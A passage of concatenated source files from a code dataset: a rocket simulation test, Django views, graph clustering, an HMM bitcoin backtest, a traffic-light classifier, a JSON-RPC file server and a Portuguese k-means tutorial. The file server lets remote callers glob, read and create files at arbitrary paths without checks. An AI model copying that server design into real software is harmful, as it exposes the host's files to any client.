plot_propelled_ascent(p, exp_out):\n fig, ax = plt.subplots(5, 1, sharex=True, figsize=(4, 8))\n t_imp = p.get_val('traj.propelled_ascent.timeseries.time', 's')\n t_exp = exp_out.get_val('traj.propelled_ascent.timeseries.time', 's')\n\n ax[0].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.p', 'bar'), 'ro', markerfacecolor='None')\n ax[0].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.p', 'bar'), 'r-')\n ax[0].set_ylabel('p (bar)')\n ax[0].set_ylim(bottom=0)\n\n ax[1].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.V_w', 'L'), 'ro', markerfacecolor='None')\n ax[1].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.V_w', 'L'), 'r-')\n ax[1].set_ylabel('$V_w$ (L)')\n ax[1].set_ylim(0, p.get_val('traj.parameters:V_b', 'L')[0])\n\n ax[2].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.T', 'N'), 'ro', markerfacecolor='None')\n ax[2].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.T', 'N'), 'r-')\n ax[2].set_ylabel('T (N)')\n ax[2].set_ylim(bottom=0)\n\n ax[3].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.v', 'm/s'), 'ro', markerfacecolor='None')\n ax[3].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.v', 'm/s'), 'r-')\n ax[3].set_ylabel('v (m/s)')\n ax[3].set_ylim(bottom=0)\n\n ax[4].plot(t_imp, p.get_val('traj.propelled_ascent.timeseries.gam', 'deg'), 'ro', markerfacecolor='None')\n ax[4].plot(t_exp, exp_out.get_val('traj.propelled_ascent.timeseries.gam', 'deg'), 'r-')\n ax[4].set_ylabel('$\\gamma$ (deg)')\n ax[4].yaxis.set_major_locator(mpl.ticker.MaxNLocator(nbins='auto', steps=[1, 1.5, 3, 4.5, 6, 9, 10]))\n\n ax[-1].set_xlabel('t (s)')\n\n fig.tight_layout()\n\n\ndef summarize_results(water_rocket_problem):\n p = water_rocket_problem\n Entry = namedtuple('Entry', 'value unit')\n summary = {\n 'Launch angle': Entry(p.get_val('traj.propelled_ascent.timeseries.gam', units='deg')[0, 0], 'deg'),\n 'Flight angle at end of propulsion': Entry(p.get_val('traj.propelled_ascent.timeseries.gam',\n units='deg')[-1, 0], 'deg'),\n 'Empty mass': Entry(p.get_val('traj.parameters:m_empty', units='kg')[0], 'kg'),\n 'Water volume': Entry(p.get_val('traj.propelled_ascent.timeseries.V_w', 'L')[0, 0], 'L'),\n 'Maximum range': Entry(p.get_val('traj.descent.timeseries.r', units='m')[-1, 0], 'm'),\n 'Maximum height': Entry(p.get_val('traj.ballistic_ascent.timeseries.h', units='m')[-1, 0], 'm'),\n 'Maximum velocity': Entry(p.get_val('traj.propelled_ascent.timeseries.v', units='m/s')[-1, 0], 'm/s'),\n }\n\n return summary\n\n\nif __name__ == '__main__': # pragma: no cover\n unittest.main()\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/water_rocket/test/test_water_rocket.py","file_name":"test_water_rocket.py","file_ext":"py","file_size_in_byte":10803,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"8352265665","text":"#!/usr/bin/python3\ndef search_replace(my_list, search, replace):\n \"\"\" replaces element in a list \"\"\"\n if my_list is None:\n return\n if my_list.count(search) == 0:\n return my_list\n new_list = my_list[:]\n while new_list.count(search) > 0:\n idx = new_list.index(search)\n new_list[idx] = replace\n return new_list\n","repo_name":"nwamanna/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30107882807","text":"from django.shortcuts import render\nfrom .models import *\n\ndef index(request):\n\n products1 = Product1.objects.all()\n products2 = Product2.objects.all()\n products3 = Product3.objects.all()\n products4 = Product4.objects.all()\n producttop = ProductTop.objects.all()\n\n return render(request, 'index.html',{\n 'products1': products1,\n 'products2': products2,\n 'products3': products3,\n 'products4': products4,\n 'producttop': producttop\n\n })\n\ndef productview(request, pk):\n\n products1 = Product1.objects.filter(id=pk).all()\n\n\n return render(request, 'product.html',{\n 'products1': products1,\n\n })\n\ndef productview2(request, dk):\n products2 = Product2.objects.filter(id=dk).all()\n\n return render(request, 'product2.html', {\n 'products2': products2,\n\n })\n\ndef productview3(request, sk):\n products3 = Product3.objects.filter(id=sk).all()\n\n return render(request, 'product3.html', {\n 'products3': products3,\n\n })\n\n\ndef productview4(request, lk):\n products4 = Product4.objects.filter(id=lk).all()\n\n return render(request, 'product4.html', {\n 'products4': products4\n })\n\ndef producttopview(request, id):\n producttop = ProductTop.objects.filter(id=id).all()\n\n return render(request, 'producttop.html', {\n 'producttop': producttop\n })\n\ndef products(request):\n products1 = Product1.objects.all()\n products2 = Product2.objects.all()\n products3 = Product3.objects.all()\n products4 = Product4.objects.all()\n producttop = ProductTop.objects.all()\n\n return render(request, 'products.html', {\n 'products1': products1,\n 'products2': products2,\n 'products3': products3,\n 'products4': products4,\n 'producttop': producttop\n\n })\n\n\ndef productbottom(request):\n return render(request, 'product4bottom.html')\n\n\n\n","repo_name":"Umar23A/ctradegroup","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28460510631","text":"from networkx.algorithms.community import k_clique_communities as kcc_one\nimport networkx as nx\n\n\ndef k_clique(g):\n \"\"\"\n :param g: 图G\n :return: set(result_all): 社区列表\n \"\"\"\n \"\"\"写成3-clique-->2-clique-->1-clique形式的社区划分算法\"\"\"\n G = nx.Graph(g)\n result_all = []\n kcc_temp_1 = list(list(val) for val in kcc_one(G, 3))\n result_all.extend(kcc_temp_1)\n test1_clique = []\n for val in kcc_temp_1:\n test1_clique.extend(val)\n G.remove_nodes_from(list(set(test1_clique)))\n kcc_temp_2 = list(list(val) for val in kcc_one(G, 2))\n result_all.extend(kcc_temp_2)\n test2_clique = []\n for val in kcc_temp_2:\n test2_clique.extend(val)\n G.remove_nodes_from(list(set(test2_clique)))\n for val in G.nodes():\n result_all.append(val)\n return result_all\n","repo_name":"Night-Quiet/Theme-Evolution","sub_path":"function/common/k_clique.py","file_name":"k_clique.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22503990324","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom hmmlearn.hmm import GaussianHMM\nimport datetime\nimport seaborn as sns\n\nfrom catalyst import run_algorithm\nfrom catalyst.api import (record, symbol, order_target_percent, date_rules, time_rules, get_datetime)\n\ndef warn(*args, **kwargs):\n pass\n\nimport warnings\nwarnings.warn = warn\n\n# Normalized st. deviation\ndef std_normalized(vals):\n return np.std(vals) / np.mean(vals)\n\n# Ratio of diff between last price and mean value to last price\ndef ma_ratio(vals):\n return (vals[-1] - np.mean(vals)) / vals[-1]\n\n# z-score for volumes\ndef values_deviation(vals):\n return (vals[-1] - np.mean(vals)) / np.std(vals)\n\ndef add_to_log(file, text):\n with open(file, 'a') as f:\n f.write(text + '\\n') \n\ndef initialize(context):\n context.asset = symbol('btc_usd')\n context.leverage = 1.0\n\n context.std_period = 10\n context.ma_period = 10\n context.price_deviation_period = 10\n context.volume_deviation_period = 10\n context.n_periods = 5 + int(np.max([context.std_period, context.ma_period,\n context.price_deviation_period, context.volume_deviation_period]))\n context.tf = '1440T'\n\n context.model = joblib.load('quandl_BITFINEX_BTCUSD_final_model.pkl')\n context.cols_features = ['last_return', 'std_normalized', 'ma_ratio', 'price_deviation', 'volume_deviation']\n context.long_states = [2]\n context.random_states = [1]\n context.short_states = [0]\n\n context.set_commission(maker = 0.001, taker = 0.002)\n context.set_slippage(slippage = 0.0005)\n context.set_benchmark(context.asset)\n\ndef handle_data(context, data):\n current_date = get_datetime().date()\n current_time = get_datetime().time()\n\n # Just one time in a day (first minute)\n if current_time.hour == 0 and current_time.minute == 0 and current_time.second == 0:\n prices = pd.DataFrame()\n volumes = pd.DataFrame()\n\n try:\n prices = data.history(context.asset,\n fields = 'price',\n bar_count = context.n_periods,\n frequency = context.tf)\n\n volumes = data.history(context.asset,\n fields = 'volume',\n bar_count = context.n_periods,\n frequency = context.tf)\n except:\n print('NO DATA')\n\n if prices.shape[0] == context.n_periods and volumes.shape[0] == context.n_periods:\n features = pd.DataFrame()\n features['price'] = prices\n features['volume'] = volumes\n features['last_return'] = features['price'].pct_change()\n features['std_normalized'] = features['price'].rolling(context.std_period).apply(std_normalized)\n features['ma_ratio'] = features['price'].rolling(context.ma_period).apply(ma_ratio)\n features['price_deviation'] = features['price'].rolling(context.price_deviation_period).apply(values_deviation)\n features['volume_deviation'] = features['volume'].rolling(context.volume_deviation_period).apply(values_deviation)\n\n state = context.random_states[0]\n if features.dropna().shape[0] == (context.n_periods - context.ma_period + 1):\n state = int(context.model.predict(features[context.cols_features].dropna())[-1])\n else:\n print('PROBLEM: features dataframe is too small')\n\n print('State on ' + str(current_date) + ' ' + str(current_time) + ': ' + str(state))\n \n print('Amount on ' + str(current_date) + ' ' + str(current_time) + ': ' + str(context.portfolio.positions[context.asset].amount))\n print(prices.dropna())\n print(volumes.dropna())\n\n if context.portfolio.positions[context.asset].amount <= 0 and state in context.long_states:\n print('LONG on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, 1.0 * context.leverage)\n context.best_price_ts = data.current(context.asset, 'close')\n\n if context.portfolio.positions[context.asset].amount != 0 and state in context.random_states:\n print('CLOSE on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, 0.0)\n\n if context.portfolio.positions[context.asset].amount >= 0 and state in context.short_states:\n print('SHORT on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, -1.0 * context.leverage) \n context.best_price_ts = data.current(context.asset, 'close') \n\n record(price = prices[-1],\n state = state,\n amount = context.portfolio.positions[context.asset].amount)\n\n \ndef analyze(context, perf):\n sns.set()\n\n # Summary output\n print(\"Total return: \" + str(perf.algorithm_period_return[-1]))\n print(\"Sortino coef: \" + str(perf.sortino[-1]))\n print(\"Max drawdown: \" + str(np.min(perf.max_drawdown[-1])))\n print(\"alpha: \" + str(perf.alpha[-1]))\n print(\"beta: \" + str(perf.beta[-1]))\n\n f = plt.figure(figsize = (7.2, 7.2))\n\n # Plot return\n ax1 = f.add_subplot(211)\n ax1.plot(perf.algorithm_period_return, 'blue')\n ax1.plot(perf.benchmark_period_return, 'red')\n ax1.legend()\n ax1.set_title(\"Returns\")\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Value')\n\n # Plot state\n ax2 = f.add_subplot(212, sharex = ax1)\n ax2.plot(perf.state, 'grey')\n ax2.set_title(\"State\")\n ax2.set_xlabel('Time')\n ax2.set_ylabel('Value')\n\n plt.tight_layout()\n plt.show()\n\n\nrun_algorithm(\n capital_base = 100000,\n data_frequency = 'minute',\n initialize = initialize,\n handle_data = handle_data,\n analyze = analyze,\n exchange_name = 'bitfinex',\n quote_currency = 'usd',\n start = pd.to_datetime('2018-1-1', utc = True),\n end = pd.to_datetime('2019-5-22', utc = True))\n\n","repo_name":"lamres/hmm_market_behavior","sub_path":"hmm_market_behavior_following_btcusd_catalyst.py","file_name":"hmm_market_behavior_following_btcusd_catalyst.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"68"} +{"seq_id":"17720148057","text":"from django.contrib import admin\nfrom .models import Codes\n\n\nclass CodesAdmin(admin.ModelAdmin):\n list_display = ['id', 'prod', 'serialNum', 'code', 'loadDate', 'ignor', 'sold', 'soldDate', 'order']\n list_editable = ['ignor', 'sold']\n list_filter = ['prod', 'order', 'code']\n\n\nadmin.site.register(Codes, CodesAdmin)\n","repo_name":"MaxCzech/itstep","sub_path":"codes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12416525227","text":"from LibPeer.Formats.BinaryAddress import BinaryAddress\n\nimport queue\nimport struct\nimport uuid\nimport msgpack\n\nclass Reply:\n def __init__(self, peer: BinaryAddress, data: bytes):\n self.peer = peer\n self.token = None\n\n self._has_object = False\n self._is_complete = False\n\n self._object_data = b\"\"\n self._object_data_size = 0\n self._binary_data = queue.Queue()\n self._binary_data_size = 0\n self._binary_data_received = 0\n self._binary_data_read = 0\n self._received_binary_size = False\n\n\n # Read header information\n self._object_data_size = struct.unpack(\"!I\", data[:4])[0]\n self.token = uuid.UUID(bytes=data[4:20])\n\n # Pass the rest into _receive\n self._receive(data[20:])\n\n\n def _receive(self, data: bytes):\n if(len(self._object_data) < self._object_data_size):\n # Figure how much more we need to read\n data_left = self._object_data_size - len(self._object_data)\n\n # Read up to that amount\n obj_data = data[:data_left]\n\n # Catch any leftovers\n leftovers = data[data_left:]\n\n # Add new data to buffer\n self._object_data += obj_data\n\n # Run any leftovers through this function\n if(len(leftovers) > 0):\n self._has_object = True\n return self._receive(leftovers)\n\n elif(not self._received_binary_size):\n # Get the binary size\n self._binary_data_size = struct.unpack(\"!Q\", data[:8])[0]\n\n # Mark size as received\n self._received_binary_size = True\n\n # Get leftovers\n leftovers = data[8:]\n\n # Run any leftovers through this function\n if(len(leftovers) > 0):\n return self._receive(leftovers)\n \n elif(self._binary_data_size == 0):\n self._is_complete = True\n\n elif(self._binary_data_received < self._binary_data_size):\n # Figure how much more we need to read\n data_left = self._binary_data_size - self._binary_data_received\n\n # Read up to that amount\n bin_data = data[:data_left]\n\n # Catch any leftovers\n leftovers = data[data_left:]\n\n # Update received amount\n self._binary_data_received += len(bin_data)\n\n # Add to queue\n self._binary_data.put(bin_data)\n\n if(self._binary_data_size <= self._binary_data_received):\n self._is_complete = True\n\n # Return leftovers\n if(len(leftovers) > 0):\n return leftovers\n\n\n def get_object(self, encoding=\"utf-8\"):\n \"\"\"Returns the object sent in the reply\"\"\"\n return msgpack.unpackb(self._object_data, encoding=encoding)\n\n\n def read(self):\n \"\"\"Reads all buffered data received so far\"\"\"\n # Hold data\n data = b\"\"\n\n while self._binary_data.qsize() != 0:\n # Get data from fifo (exception if no data)\n hunk = self._binary_data.get_nowait()\n # Buffer data\n data += hunk\n\n self._binary_data_read += len(data)\n \n return data\n\n\n def read_all(self):\n \"\"\"Reads all remaining data from the data part of the reply\"\"\"\n data = b\"\"\n\n # Calculate the amount of data that has to be read before we are done reading\n expected_size = self._binary_data_size - self._binary_data_read\n\n while len(data) != expected_size:\n # Read more data\n data += self._binary_data.get()\n\n self._binary_data_read += len(data)\n return data\n\n\n @property\n def transfer_information(self):\n \"\"\"Tuple containing information on the progress of the transfer of the binary data section of the reply.\n In order, it contains data size, data received, data read, fraction of data received, fraction of data read.\"\"\"\n return (self._binary_data_size, self._binary_data_received, self._binary_data_read, self._binary_data_received / float(self._binary_data_size), self._binary_data_read / float(self._binary_data_size))","repo_name":"Tilo15/LibPeer-Python","sub_path":"LibPeer/Interfaces/SODI/Reply.py","file_name":"Reply.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24522986028","text":"from styx_msgs.msg import TrafficLight\nimport cv2\nimport tensorflow as tf\nimport numpy as np\n\nclass TLClassifier(object):\n def __init__(self):\n self.model = None\n self.width = 0\n self.height = 0\n self.channels = 3\n\n def setup_classifier(self, model, width, height, channels=3):\n self.width = width\n self.height = height\n self.model = model\n self.channels = channels\n # necessary work around to avoid troubles with keras\n self.graph = tf.get_default_graph()\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n resized = cv2.resize(image, (self.width,self.height))\n resized = resized / 255.; # Normalization\n # necessary work around to avoid troubles with keras\n with self.graph.as_default():\n predictions = self.model.predict(resized.reshape((1, self.height, self.width, self.channels)))\n color = predictions[0].tolist().index(np.max(predictions[0]))\n tl = TrafficLight()\n tl.state = color\n return tl.state\n","repo_name":"ericlavigne/CarND-Capstone-Wolf-Pack","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"4577416072","text":"import argparse, socket\nimport sys\nimport time, os, glob\nfrom jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer\n\ndef ngelist1():\n print(\"Ngelist...\")\n daftar=glob.glob(\"./*\")\n isi=\" \"\n for i in daftar:\n isi += i + \"\\n\"\n print(\"Udah ngelistnya yeay\")\n return isi\n\ndef ngelist2(String):\n print(\"Ngelist...\")\n daftar=glob.glob(String)\n isi=\" \"\n for i in daftar:\n isi += i + \"\\n\"\n print(\"Udah ngelistnya yeay\")\n return isi\n\ndef ngitung(String):\n print(\"Ngitung...\")\n daftar=glob.glob(String)\n count=0\n for i in daftar:\n count+=1\n print(\"Udah ngitungnya yeay\")\n return count\n\ndef ngambil(String):\n print('Ngambil...')\n msg=String.split()\n tempat= ' '.join(msg[:-1])\n tempat2=[tempat, msg[-1]]\n msg2 = '/'.join(tempat2)\n f=open(msg2, \"rb\")\n b=f.read()\n tulis= \"fetch: \" + tempat + \"\\nsize: \" + str(len(b)) + \"\\nlokal: \" + msg[-1]\n print(\"Udah ngambilnya yeay\")\n return tulis\n\ndef bikin(String):\n print('Bikin...')\n msg=String.split()\n tempat= ' '.join(msg[1:])\n tempat2=[tempat, msg[0]]\n msg2 = '/'.join(tempat2)\n f=open(msg2, \"x\")\n f.close()\n tulis= \"put: \" + tempat + \"\\nlokal: \" + msg[0]\n print(\"Udah bikinnya yeay\")\n return tulis\n\ndef tutup():\n print(\"Shuting down...\")\n sys.exit(0)\n\ndef main():\n server = SimpleJSONRPCServer(('localhost', 7002))\n server.register_function(ngelist1)\n server.register_function(ngelist2)\n server.register_function(ngambil)\n server.register_function(ngitung)\n server.register_function(bikin)\n server.register_function(tutup)\n print(\"Starting server\")\n server.serve_forever()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()","repo_name":"reyhannaufal/network-programming","sub_path":"tugas-4/json_server.py","file_name":"json_server.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34964511491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Aprendizado de máquina - II\n\n# No capítulo anterior, aprendemos a resolver um problema de classificação, que recai na classe de aprendizado de máquina supervisionado. Neste capítulo, estudaremos o aprendizado de máquina não supervisionado resolvendo um problema de _clusterização_.\n# \n# Como já sabemos, no aprendizado não supervisionado, procuramos por \"estruturas escondidas\" em um banco de dados não rotulado. Enquanto no aprendizado supervisionado é possível medir erros entre os valores esperados e os previstos, no aprendizado não supervisionado os algoritmos devem apelar para as exclusivamente para as _features_ do banco de dados e categorizá-las aplicando algum critério estatístico ou geométrico.\n\n# ## Breves comentários sobre aprendizagem\n\n# A _aprendizagem_ é um conceito que pode ser quantificado por meio de erros. Durante o treinamento de um algoritmo de _machine learning_, dois erros são estimados. \n# \n# O primeiro é o _erro de treinamento_, que mede a discrepância entre as amostras observadas e as amostras apenas do conjunto de treinamento. No problema de classificação por exemplo, o erro de treinamento $e_i = e(x_i,y_i)$ para cada observação $x_i$ e resposta $y_i$ poderia ser calculado usando uma função indicadora que contaria todas as amostras corretamente calculadas. Ou seja,\n# \n# $$e_i = e(x_i,y_i) =\n# \\begin{cases}\n# 1, \\ \\ \\text{se} \\ \\ h(x_i) = y_i \\\\\n# 0, \\ \\ \\text{caso contrário}\n# \\end{cases}$$\n# \n# O erro de treinamento seria então definido por \n# \n# $$E_{tr} = \\frac{ \\sum_{i=1}^n e_i }{n},$$\n# \n# para $n$ amostras do conjunto de treinamento.\n# \n# O segundo erro é o _erro de teste_ ou _erro de generalização_, que é um erro médio calculado sobre os dados não vistos. Este erro é chamado de $E_gen$.\n# \n# Em geral, $E_{gen} \\geq E_{tr}$ e a _aprendizagem_ é atingida quando $E_{gen}$ é o menor possível. Para tanto, intuitivamente, ou $E_{tr}$ deve tender a zero, ou $E_{gen}$ deve ser aproximar de $E_{tr}$. \n# \n# Assim, a aprendizagem é o resultado de $E_{tr} \\to 0$, ou $E_{gen} \\approx E_{tr}$. Isto é, um excelente treinamento deve conduzir a um modelo de aprendizagem robusto.\n# \n# A aprendizagem é medida por meio de _curvas de aprendizagem_, que possuem aparência assintótica. Modelos com alto desempenho durante a etapa de treinamento que generalizam mal tendem a sofrer um _superajustamento_ (_overfitting_). Modelos com baixo desempenho já durante a etapa de treinamento tendem a sofrer um _subajustamento_ (_underfitting_). Ambos os comportamentos são percebidos nas curvas de aprendizagem. A correção de _overfitting_ ou _underfitting_ pode ser feita com várias técnicas. Uma delas é a _regularização_.\n\n# ## Treinamento, validação e generalização\n# \n# Vale fazer um breve adendo sobre esses três conceitos:\n# \n# - _treinamento_: etapa em que se verifica o desempenho de um modelo a partir de uma classe de modelos.\n# - _validação_: etapa em que se selecionam os melhores hiperparâmetros do modelo tendo por base estimativas do erro de generalização. \n# - _generalização (ou teste)_: etapa exclusiva em que se avalia o desempenho final do modelo sobre um conjunto de dados que nunca deve ser usado nas etapas de treinamento ou validação. \n# \n# O ajustamento dos melhores parâmetros duranta a etapa de validação pode ser realizado por várias técnicas. Uma das mais conhecidas é a _validação cruzada_ (_cross validation_). \n\n# ## Estudo de caso: clusterização de dados aleatórios\n# \n# Estudaremos um problema de clusterização como exemplo de aplicação do aprendizado de máquina não supervisionado. Relembre que nesta classe de aprendizado, não há como mensurar erros no cálculo de desempenho do modelo, visto que os dados fornecidos não são rotulados. Então, a única maneira de explicar os dados dá-se por critérios estatísticos, geométricos ou de similaridade.\n# \n# ### O que é clusterização? \n# \n# A clusterização é baseada no particionamento dos dados não rotulados em subconjuntos disjuntos chamados _clusters_, de forma que os elementos de um cluster sejam altamente similares (alta _similaridade intra-classe_) e os elementos de clusters distintos possuam baixa similaridade com os os demais clusters (baixa _similaridade inter-classe_ ).\n# \n# Devido à arbitrariedade com que os dados podem ser agrupados em _clusters_, a clusterização tende a ser subjetiva e a qualidade dependente da aplicação e da avaliação do analista.\n\n# ### Similaridade e distância\n# \n# Estabelecer \"similaridade\" entre instâncias pode ser um pouco difícil. Em problemas de clusterização, uma forma de aproximar essa ideia é usar distâncias. Uma fórmula generalizada é a _distância de Minkowski_, dada por\n# \n# $$d({\\bf x},{\\bf y}) = \\left( \\sum_{i=1}^d | x_i - y_i |^p \\right)^{1/p},$$\n# \n# com ${\\bf x}$ e ${\\bf y}$ vetores do espaço $\\mathbb{R}^n$ e $p \\in \\mathbb{R}$ é um parâmetro. Dependendo do valor de $p$, a fórmula se reduz a outras distâncias conhecidas:\n# \n# - Se $p = 2$, temos a _distância Euclidiana_;\n# - Se $p = 1$, temos a _distância de Manhattan_ (ou _distância do taxista_);\n# - Se $p = \\infty$, temos a _distância de Chebyshev_ (ou _distância do máximo_), definida por $\\max \\{ | x_i - y_i | \\}$, isto é, a componente com o maior módulo.\n# \n# ```{hint}\n# Para saber mais sobre outras definições de distância, veja a documentação da função \n# `scipy.spatial.distance` do módulo Scipy.\n# ```\n\n# ### O algoritmo _k-means_\n# \n# _k-means_ é um algoritmo classificado como de _partição rígida_ que atribui cada elemento no espaço de _features_ a um único cluster. Os passos do algoritmo são: \n# \n# 1. Inicialize o valor _k_ de clusters desejados;\n# 2. Inicialize os centroides dos _k clusters_;\n# 3. Atribua cada uma das _n_ amostras de dados ao cluster cujo centroide está mais próximo da amostra;\n# 4. Redefina os _k_ centroides iterativamente assumindo que estejam corretos;\n# 5. Se nenhuma amostra migrar de um cluster para outro na última iteração, pare. Caso contrário, retorne ao passo 3.\n# \n# Vejamos um exemplo sobre um conjunto de dados aleatórios.\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# In[2]:\n\n\n# cria dados aleatórios\nN = 40\n\nX1 = 1.25*np.random.randn(N,2)\nX2 = 5 + 1.5*np.random.randn(N,2)\nX3 = [8,3] + 1.2*np.random.randn(N,2)\n\nX = np.concatenate([X1,X2,X3])\n\nX.shape\n\n\n# Vamos criar rótulos para os 3 grupos e mostrar a clusterização segundo o que nós pré-determinamos e o que, de fato, é passado como entrada para o algoritmo.\n\n# In[3]:\n\n\n# cria labels\nc = np.concatenate([np.full(N,1), np.full(N,2), np.full(N,3)])\n\nplt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.scatter(X1[:,0],X1[:,1],color='r')\nplt.scatter(X2[:,0],X2[:,1],color='g')\nplt.scatter(X3[:,0],X3[:,1],color='b')\nplt.title('Dados rotulados')\n\nplt.subplot(1,2,2)\nplt.scatter(X[:,0],X[:,1],color='k')\nplt.title('Dados \"vistos\" pelo algoritmo');\n\n\n# Usa _k-means_ com inicialização de 3 clusters.\n\n# In[4]:\n\n\nfrom sklearn import cluster\n\n# no. de clusters\nk = 3\n\n# ajusta parâmetros de aprendizagem\ncfit = cluster.KMeans(init='random',n_clusters=k)\ncfit.fit(X)\n\n\n# In[5]:\n\n\n# labels do ajuste\nprint(cfit.labels_)\n\n\n# In[6]:\n\n\n# plota comparativo de labels (original x ajuste)\ncl = cfit.labels_ + 1\n\nplt.scatter(X[cl==1,0], X[cl==1,1],color='r')\nplt.scatter(X1[:,0],X1[:,1],color='gray',edgecolor='k',alpha=0.4)\n\nplt.scatter(X[cl==2,0], X[cl==2,1],color='g')\nplt.scatter(X2[:,0],X2[:,1],color='gray',edgecolor='c',alpha=0.4)\n\nplt.scatter(X[cl==3,0], X[cl==3,1],color='r')\nplt.scatter(X3[:,0],X3[:,1],color='gray',edgecolor='m',alpha=0.4);\n\nplt.title('Rótulos originais x rótulos do ajuste');\n\n\n# Criando pontos novos no espaço que cobre os dados originais. \n\n# In[7]:\n\n\n# gera \"grade\" 2D de pontos \n# em [-5,15] x [-5,15]\nx = np.linspace(-5,15,200)\nXX,YY = np.meshgrid(x,x)\nsz = XX.shape\n\n# concatena\ndata = np.c_[XX.flatten(), YY.flatten()]\n\n# predição\nZ = cfit.predict(data)\n\n\n# Verificando partição do espaço determinado pelo algoritmo x dados originais.\n\n# In[8]:\n\n\n# partições do espaço\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n origin='lower', extent=(-5,15,-5,15), \n alpha=0.3,vmin=0,vmax=k-1)\n\n\nplt.scatter(X[c==1,0], X[c==1,1],color='r')\nplt.scatter(X[c==2,0], X[c==2,1],color='g')\nplt.scatter(X[c==3,0], X[c==3,1],color='b')\nplt.title('Partições do espaço');\n\n\n# Então, comparamos o resultado da clusterização em comparação com os dados originais.\n\n# In[9]:\n\n\nplt.figure(figsize=(10,4))\n\nplt.subplot(1,2,1)\n\n# overlay\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n origin='lower', extent=(-5,15,-5,15), \n alpha=0.3,vmin=0,vmax=k-1)\n\n# original\nplt.title('Rótulos originais')\nplt.scatter(X[c==1,0], X[c==1,1],color='r')\nplt.scatter(X[c==2,0], X[c==2,1],color='g')\nplt.scatter(X[c==3,0], X[c==3,1],color='b')\n\nplt.subplot(1,2,2)\n\n# overlay\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n origin='lower', extent=(-5,15,-5,15), \n alpha=0.3,vmin=0,vmax=k-1)\n\n# clusterização\nplt.title('Rótulos da clusterização')\nplt.scatter(X[cl==1,0], X[cl==1,1],color='r')\nplt.scatter(X[cl==2,0], X[cl==2,1],color='g')\nplt.scatter(X[cl==3,0], X[cl==3,1],color='b');\n\n\n# ## Métricas de qualidade para clusterização\n# \n# Vejamos brevemente uma métrica conhecida para comparar resultados de clusterização.\n\n# ### Coeficiente de Silhueta\n# \n# O _coeficiente de silhueta_ $s$ é um valor atribuído a cada ponto de um cluster para medir a \"silhueta\" de seu cluster. Em linhas gerais, este coeficiente é usado para definir se houve uma \"boa\" clusterização do dataset. Matematicamente,\n# \n# $$s(i) = \\frac{b(i) - a(i)}{\\max \\{a(i),b(i)\\}},$$\n# \n# onde \n# \n# - $a(i)$ é a distância média intra-cluster da amostra $i$, isto é, a distância média da amostra $i$ a todos as suas \"irmãs\", percententes ao seu mesmo _cluster_. Este valor mede a dissimilaridade de $i$ em relação às suas amostras \"irmãs\".\n# \n# - $b(i)$ é a distância média inter-cluster da amostra $i$, considerando o cluster _A_ ao qual ela pertence e o _cluster_ _B_ mais próximo de _A_. Este valor mede a dissimilaridade de $i$ em relação a todas as amostras em _B_.\n# \n# O valor de $s$ varia no intervalo [-1,1] e a interpretação é a seguinte. Quando $s=-1$, a clusterização é considerada incorreta; quando $s=1$, a clusterização está muito densa. Quando $s \\approx 0$, há _clusters_ que sobrepõem.\n\n# Vamos calcular $s$ para o nosso exemplo.\n\n# In[10]:\n\n\nfrom sklearn import metrics\n\nss = metrics.silhouette_samples(X,cl,metric='euclidean')\n\nssm = metrics.silhouette_score(X,cl,metric='euclidean')\n\n\n# In[11]:\n\n\nplt.title('Coeficiente de silhueta por amostra')\nplt.plot(ss,'+');\nplt.plot(np.arange(len(ss)),np.full(np.shape(ss),ssm),':',label='s médio');\nplt.legend();\n\n\n# ### Análise de silhueta\n# \n# O plot de silhueta permite que busquemos o número adequado de 